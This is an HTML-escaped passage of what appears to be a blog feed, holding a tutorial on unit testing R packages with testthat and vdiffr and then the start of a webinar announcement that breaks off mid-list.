&lt;img src="https://www.jumpingrivers.com/blog/r-testthat/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;One of our main projects at Jumping Rivers in the last year has been building the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;litmus&lt;/a&gt;
platform for validation of R packages. Among other metrics of interest, an important component when assessing the
quality of code within a package is unit tests.
In this blog we discuss the main features of the &lt;code&gt;{testthat}&lt;/code&gt; package, as a convenient way for testing R code.&lt;/p&gt;
&lt;h1 id="testing-in-r"&gt;Testing in R&lt;/h1&gt;
&lt;p&gt;Testing is an important step when developing code in R or any other language. If you are a Python user, you can consider reading our previous
blogs in &lt;a href="https://www.jumpingrivers.com/blog/python-testing-advanced/" rel="external"&gt;pytest&lt;/a&gt;. Writing tests helps us make sure that the code is
working as expected. In the R ecosystem, the &lt;a href="https://testthat.r-lib.org/index.html" rel="external"&gt;testthat&lt;/a&gt; package is one of the most used
frameworks. In this blog we will explore some of the main properties of &lt;code&gt;{testthat}&lt;/code&gt; highlighting some of the most useful functions with some examples.&lt;/p&gt;
&lt;p&gt;Before starting, although it is possible to use {testthat} outside of an R package it works best within an R package so the directory structure of the code
and testing code should look like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;./testthatExample/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── R/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── function1.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── function2.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── tests/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── testthat.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ └── testthat/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── test-function1.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── test-function2.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;└── DESCRIPTION
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;where the main functions, in our case &lt;code&gt;function1.R&lt;/code&gt;, &lt;code&gt;function2.R&lt;/code&gt; are stored in &lt;code&gt;R/&lt;/code&gt; and the tests are stored under &lt;code&gt;tests/&lt;/code&gt;.
All tests should be contained in files that start with &lt;code&gt;test&lt;/code&gt;. Then automatically, when we run &lt;code&gt;testthat::test_local()&lt;/code&gt; from the root directory,
or using &lt;code&gt;devtools::test()&lt;/code&gt; the tests are recognised accordingly.&lt;/p&gt;
&lt;h2 id="installing-and-loading-testthat"&gt;Installing and Loading testthat&lt;/h2&gt;
&lt;p&gt;First, let&amp;rsquo;s install and load the package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install testthat &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;testthat&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(testthat)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="basic-testthat-structure"&gt;Basic testthat Structure&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;testthat&lt;/code&gt; package is built around three main components:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Expectations&lt;/strong&gt;: The building blocks that check if a result matches what you expect&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tests&lt;/strong&gt;: Groups of expectations that test a specific function or behavior&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Test files&lt;/strong&gt;: Collections of tests, typically organised by the functions they&amp;rsquo;re testing&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let&amp;rsquo;s start with the most commonly used expectations:&lt;/p&gt;
&lt;h3 id="testing-equality"&gt;Testing Equality&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;expect_equal()&lt;/code&gt; function tests for near equality, and it is good for floating point numbers, while &lt;code&gt;expect_identical()&lt;/code&gt;
tests for the exact equality.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_identical&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1L&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2L&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3L&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-r-testthat"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="testing-errors-and-warnings"&gt;Testing Errors and Warnings&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;expect_error()&lt;/code&gt; checks if the code throws an error, &lt;code&gt;expect_warning()&lt;/code&gt; checks for warnings and &lt;code&gt;expect_silent()&lt;/code&gt;
checks that code runs without errors or warnings. Although it is better practice to test for specific error and warning messages,
we don&amp;rsquo;t &lt;em&gt;have&lt;/em&gt; to. See in the code below, the first example of &lt;code&gt;expect_error&lt;/code&gt; and &lt;code&gt;expect_warning&lt;/code&gt; we haven&amp;rsquo;t passed a specific
message to check for. This means if the code returns an error / warning respectively then the test will pass.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_error&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;not a number&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_error&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;stop&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Something went wrong&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;Something went wrong&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_warning&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_warning&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;not_a_number&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_silent&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="testing-data-types"&gt;Testing Data Types&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;expect_type()&lt;/code&gt; and &lt;code&gt;expect_[s3|s4|s7]_class()&lt;/code&gt; functions check if the code returns an object inherits from the expected base type or from a specified S3, S4 or s7 class.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_type&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;double&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_type&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;integer&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_s3_class&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;data.frame&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="testing-a-simple-function"&gt;Testing a simple function&lt;/h3&gt;
&lt;p&gt;Let us have a look at a function which is stored inside &lt;code&gt;function1.R&lt;/code&gt; file and has the following structure:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Function to calculate the sum of a vector&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;get_sum &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The tests that we can write for the above function would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Tests for get_sum function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;get_sum calculates the sum correctly&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_sum&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)), &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_sum&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)), &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;get_sum handles invalid inputs&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_error&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_sum&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;The argument of the function must be a number&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here we have created a test case with some description. We start with the &lt;code&gt;test_that&lt;/code&gt; function call, providing both a description
of the test followed by the testing block.&lt;/p&gt;
&lt;h3 id="testing-plots"&gt;Testing Plots&lt;/h3&gt;
&lt;p&gt;Here we make an example of testing a &lt;code&gt;ggplot2&lt;/code&gt; output and a base R plot.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ggplot2&lt;/code&gt; plots are easier to test because they return structured objects with accessible components:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ggplot2 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;p &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(mtcars, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mpg, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; hp)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot structure is correct&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_s3_class&lt;/span&gt;(p, &lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(rlang&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_name&lt;/span&gt;(p&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mapping&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x), &lt;span style="color:#a5d6ff"&gt;&amp;#34;mpg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note: this example may change in the future, as {ggplot2} has been rewritten to use S7 classes internally so that
would require &lt;code&gt;expect_s7_class&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Base R plots are harder to test because they produce immediate visual output without returning testable objects.
A useful package to use when we test base R plot is the &lt;code&gt;{vdiffr}&lt;/code&gt; package and the &lt;code&gt;expect_doppelganger&lt;/code&gt; function (which also works for ggplot objects).
This allows us to perform a semblance of snapshot testing for our plot, where on the initial test run an image is saved
and then compared against in future tests.&lt;/p&gt;
&lt;p&gt;Assume the following code is used to make a plot:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(vdiffr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Function that creates base R plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;create_base_scatter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(data) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mpg, data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;hp,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;MPG vs Horsepower&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xlab &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Miles per Gallon&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ylab &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Horsepower&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;16&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;abline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lm&lt;/span&gt;(hp &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; mpg, data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data), col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And the testing code for the above function would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;base R scatter plot visual output is correct&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_doppelganger&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;base_scatter_plot&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_base_scatter&lt;/span&gt;(mtcars)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The way &lt;code&gt;expect_doppelganger&lt;/code&gt; works is, an svg of the plot is saved in a sub-directory of the tests directory. Upon
future runs of the tests a new image is generated and compared against the original, if they match the test passes but
if they differ the test will fail. There are a few issues which can cause doppelganger tests to fail, like
randomness in the plot or time / date based variables so keep these in mind when writing your tests.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;testthat&lt;/code&gt; package provides a robust and intuitive framework for ensuring code quality in R packages.
From basic equality checks to plot validation, these testing strategies help catch bugs early and maintain
reliable code as your package evolves. Whether you&amp;rsquo;re testing simple mathematical functions or complex data
visualisations, incorporating comprehensive unit tests into your development workflow is essential for
building trustworthy R packages. As demonstrated through the examples in this blog,
&lt;code&gt;testthat&lt;/code&gt; makes it straightforward to implement testing practices that will benefit both you and
your package users in the long run. If you would like some further reading on {testthat}, then check out
&lt;a href="https://testthat.r-lib.org/" rel="external"&gt;the website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-testthat/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Boost Your Career with Jumping Rivers Free Monthly Webinars – Next Session on 18th September</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/</link><pubDate>Mon, 15 Sep 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-async/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Our free monthly webinar series is back, and the first session on 21 August – “Reports that Write Themselves: Automated Reporting with Quarto” was a fantastic success! It was wonderful to see the Jumping Rivers community grow, with so many data professionals joining, engaging, and sharing ideas.
Next Webinar:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;18 September, 13:05 BST&lt;/strong&gt; – &lt;em&gt;Building Scalable Shiny Apps with Asynchronous Programming&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="full-webinar-schedule"&gt;Full Webinar Schedule:&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Date &amp;amp; Time (BST)&lt;/th&gt;
&lt;th style="text-align: left"&gt;Topic&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;18 September&lt;/td&gt;
&lt;td style="text-align: left"&gt;Building Scalable Shiny Apps with Asynchronous Programming&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;23 October&lt;/td&gt;
&lt;td style="text-align: left"&gt;Understanding Posit: Ecosystem and Enterprise Use Cases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;20 November&lt;/td&gt;
&lt;td style="text-align: left"&gt;Machine Learning with Python&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;11 December&lt;/td&gt;
&lt;td style="text-align: left"&gt;Accessible Shiny: Designing for All Users&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Note: All webinars take place on the second last Thursday of each month at 13:05 UK time.&lt;/p&gt;
&lt;h2 id="why-attend"&gt;Why Attend:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Gain practical, hands-on skills in R, Python, Shiny, and Posit.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Connect with fellow data professionals and expand your network.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
